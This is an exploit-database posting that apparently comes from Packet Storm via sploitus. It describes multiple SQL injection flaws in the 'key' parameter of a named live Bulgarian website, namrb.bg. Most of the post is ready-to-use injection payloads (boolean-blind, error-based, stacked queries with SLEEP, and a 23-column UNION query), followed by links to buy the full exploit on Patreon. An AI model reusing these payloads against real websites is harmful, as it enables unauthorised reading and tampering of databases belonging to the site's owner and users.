Share
## https://sploitus.com/exploit?id=PACKETSTORM:209542
# Titles: namrb.bg app-Multiple-SQLi
    # Author: nu11secur1ty
    # Date: 09/15/2025
    # Vendor: https://www.namrb.bg/
    # Software: https://www.namrb.bg/
    # Reference: https://portswigger.net/web-security/sql-injection
    
    ## Description:
    The `key` parameter appears to be vulnerable to SQL injection attacks. A
    single quote was submitted in the cat parameter, and a database error
    message was returned. Two single quotes were then submitted and the error
    message disappeared. You should review the contents of the error message,
    and the application's handling of other input, to confirm whether a
    vulnerability is present.
    
    STATUS: HIGH-CRITICAL Vulnerability
    
    
    [+]Exploit:
    - SQLi:
    
    ```SQLi
    ---
    Parameter: key (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
        Payload: year=0&cat=0'&key=')) OR NOT 2666=2666 AND
    (('yXjW'='yXjW&s_search=%D0%A2%D1%8A%D1%80%D1%81%D0%B5%D0%BD%D0%B5
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
    BY clause (FLOOR)
        Payload: year=0&cat=0'&key=')) OR (SELECT 4704 FROM(SELECT
    COUNT(*),CONCAT(0x71707a7171,(SELECT
    (ELT(4704=4704,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND
    (('nghM'='nghM&s_search=%D0%A2%D1%8A%D1%80%D1%81%D0%B5%D0%BD%D0%B5
    
        Type: stacked queries
        Title: MySQL >= 5.0.12 stacked queries (comment)
        Payload: year=0&cat=0'&key='));SELECT
    SLEEP(11)#&s_search=%D0%A2%D1%8A%D1%80%D1%81%D0%B5%D0%BD%D0%B5
    
        Type: UNION query
        Title: MySQL UNION query (UCHAR) - 23 columns
        Payload: year=0&cat=0'&key=')) UNION ALL SELECT
    'UCHAR','UCHAR','UCHAR','UCHAR',CONCAT(0x71707a7171,0x786a4a644251656873507a717a76504c50617258467463526e61716e766d7342414d41636e544153,0x7171766b71),'UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR'#&s_search=%D0%A2%D1%8A%D1%80%D1%81%D0%B5%D0%BD%D0%B5
    ---
    ```
    ##WARNING:
    This has ALREADY been reported to the OWNER of this web application! If you
    BUY THIS POST, YOU WILL BE AUTOMATICALLY RESPONSIBLE IN FRONT OF THE LAW!
    THIS IS ONLY FOR THE OWNERS OF THIS WEB APPLICATION! THANK YOU!
    
    # Reproduce:
    [href](https://www.patreon.com/posts/namrb-org-sqli-138413412)
    
    # Buy an exploit only:
    [href](https://www.patreon.com/posts/namrb-org-sqli-138413412)
    
    # Time spent:
    00:15:00
    
    
    -- 
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstormsecurity.com/
    https://cve.mitre.org/index.html
    https://cxsecurity.com/ and https://www.exploit-db.com/
    home page: https://www.nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                              nu11secur1ty <http://nu11secur1ty.com/>